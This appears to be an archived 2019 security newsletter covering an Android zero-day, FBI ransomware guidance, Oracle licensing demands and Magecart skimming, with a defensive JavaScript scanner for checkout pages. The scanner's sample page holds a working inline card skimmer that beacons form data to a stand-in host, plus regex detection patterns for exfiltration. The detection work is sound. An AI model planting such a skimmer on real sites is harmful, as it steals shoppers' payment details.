The Truth: Android Zero-Day, The Feds Say Pay Ransomware If You Must, Oracle on a Fishing Expedition

Friday, 4 October 2019

Welcome to The Truth. This week we wrap up with a zero-day in Android, the FBI changing its stance on ransomware (again) and Oracle wanting money for software from someone who says they aren’t running it. Read all about it here.

There’s a zero-day in Android: “Attackers are exploiting a vulnerability that can give them full control of at least 18 different phone models, including four different Pixel models, a member of Google’s Project Zero research group said on Thursday night.” Apparently it’s being used by NSO Group, the notorious Israeli spyware-for-hire developer, presumably to spy on people. NSO denies this, of course. According to Ars Technica, the “exploits require little or no customization to fully root vulnerable phones.” Google reportedly wants to fix this in the October security update for Android, which should be arriving in a few days. As usual, there’s no telling when the patch will reach non-Pixel devices, since every other vendor ships Android updates on its own schedule.

Cisco has issued software updates to fix 18 security vulnerabilities in its ASA (Adaptive Security Appliance), FMC (Firepower Management Center) and FTD (Firepower Threat Defense) software. All of the vulnerabilities carry a “high” impact rating; the highest CVSS base score listed is 8.8.

At the dawn of the global ransomware wave, the FBI made headlines by telling victims to “just pay” the ransom demands because in most cases, so they said, that would be your only hope of getting your data back. If you didn’t have backups, that is. Cottoning on to the fact that this meant more people would be paying criminals, which in turn would mean the criminals’ business would flourish, which would then mean more ransomware, the FBI later reversed this stance and told people never to pay the ransom demanded by the criminals. It seems they have, again, reconsidered: “The Bureau has posted an updated version of the guidance it offers for companies on how to handle ransomware demands with a section discussing the option of paying the hackers to get data decrypted. In short, the FBI still says that companies should not cave to hacker demands and pay to have their data unlocked, but the bureau acknowledges that paying is an option.”

PostgreSQL 12 has been released. Headline features include better performance, the ability to rebuild indexes without blocking writes (REINDEX CONCURRENTLY), improved authentication via SSL and more.

Oracle wants $12,200 from a UK company for using the VirtualBox Extension Pack. Here’s the kicker: the company says it isn’t using any of Oracle’s products. “Oracle provided the company with a range of IP addresses, more than 100, that it claimed had been using its proprietary VirtualBox Extension Pack in conjunction with VirtualBox installations.” Apparently the company owns the IP range, but since it’s a network service provider, some of the IPs are used by its customers. Oracle, it seems, doesn’t care and hasn’t gotten back to the company or to The Register, which is reporting the story, with an explanation. For context: the VirtualBox base package is GPL-licensed, but the Extension Pack (USB 2.0/3.0, RDP, disk encryption and so on) ships under Oracle’s Personal Use and Evaluation License, which does not cover commercial use, and that is the lever Oracle is pulling here. There’s suspicion that this is all a “fishing expedition” by Oracle to get data on the people who are actually using those IP addresses. And if the IP list is genuine, it also means Oracle’s proprietary extension to the GPL-licensed VirtualBox hypervisor is phoning home.

Magecart, the umbrella name for the criminal groups that skim payment cards by injecting malicious JavaScript into the checkout pages of online shops (often running unpatched Magento installations), is still going strong. The injected script reads the card number and other payment details as the customer types them and sends a copy to a server the attackers control, while the order itself goes through normally. In a recent survey, security researchers counted 573 different command & control domains receiving skimmed data from almost 10,000 compromised hosts, and more than two million detections of Magecart-style malicious JavaScript. So the next time one of your credit cards gets compromised, you have a pretty good idea of how it most likely happened.
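A minimal static check for the skimmer pattern described above, added here as an example; it is not code from the newsletter or from any Magecart report. It pulls every script out of a checkout page, flags script sources from hosts the shop does not own, and flags inline scripts that read form fields, serialise them and send them to an unknown host. The checkout HTML, the hostnames and the allowlist are all constructed for the example.

```javascript
// Added example, not code from the original page or from any Magecart report.
// A static scanner for the skimmer pattern the paragraph above describes:
// a script on a checkout page that reads card fields and ships them to a
// host the shop does not own. The HTML, hostnames and allowlist below are
// constructed for this example.

// Constructed sample checkout page: one legitimate script, one injected
// third-party script and one inline skimmer.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="checkout">
  <input name="cc_number"><input name="cc_cvv"><input name="cc_exp">
</form>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example-payments.test/skimmer.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {};
  document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
  new Image().src = 'https://stats.not-our-cdn.test/c?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>`;

// The shop's own origin and the hosts it knowingly loads scripts from (assumption).
const SHOP_ORIGIN = 'https://shop.example/';
const ALLOWED_HOSTS = new Set(['shop.example']);

// Three things a skimmer has to do: read field values, serialise them, send them.
// All three must match before an inline script is flagged, to keep noise down.
const EXFIL_PATTERNS = [
  /\.value\b/,
  /btoa\(|encodeURIComponent\(|JSON\.stringify\(/,
  /new Image\(\)|\.src\s*=|fetch\(|XMLHttpRequest|navigator\.sendBeacon/,
];

// Return every <script> on the page as { src, inline: null } or { src: null, inline }.
function extractScripts(html) {
  const scripts = [];
  const tag = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tag.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push(src ? { src: src[1], inline: null } : { src: null, inline: m[2] });
  }
  return scripts;
}

// Hostnames of every absolute http(s) URL mentioned in a script body.
function externalHosts(code) {
  const hosts = new Set();
  const url = /https?:\/\/([^\/'"\s]+)/g;
  let m;
  while ((m = url.exec(code)) !== null) hosts.add(m[1].toLowerCase());
  return hosts;
}

// Scan a page and return findings: third-party script sources not on the
// allowlist, and inline scripts that match all exfiltration indicators and
// name a host not on the allowlist.
function scanCheckoutPage(html, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src !== null) {
      // A relative src resolves to the shop's own origin.
      const host = new URL(s.src, SHOP_ORIGIN).host;
      if (!allowedHosts.has(host)) findings.push({ kind: 'third-party-script', detail: host });
      continue;
    }
    const allIndicators = EXFIL_PATTERNS.every((p) => p.test(s.inline));
    const unknown = [...externalHosts(s.inline)].filter((h) => !allowedHosts.has(h));
    if (allIndicators && unknown.length > 0) {
      findings.push({ kind: 'inline-exfil', detail: unknown.join(',') });
    }
  }
  return findings;
}

// Stand-alone run over the constructed page.
for (const f of scanCheckoutPage(SAMPLE_CHECKOUT_HTML)) {
  console.log(`${f.kind}: ${f.detail}`);
}
```

Run it with Node; on the sample page it reports the injected third-party script and the inline skimmer and stays quiet about the shop’s own script. Real skimmers are usually obfuscated and hide behind look-alike domains, so treat a scanner like this as a tripwire you run against your own checkout pages, not as a defence. The controls that actually stop the exfiltration are a Content Security Policy with tight script-src, connect-src and img-src directives (the image-beacon trick in the sample is an img-src load) and Subresource Integrity on any third-party script you do load.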

Well, that’s The Truth for this week. See you for the next edition on Monday. Until then, enjoy the weekend! In honour of Android, here’s your weekend song: Zero Day by MC Frontalot.

This is an archived issue of my daily newsletter FOXTROT/ALFA. You can find more information about it, including how to subscribe via email, on this page.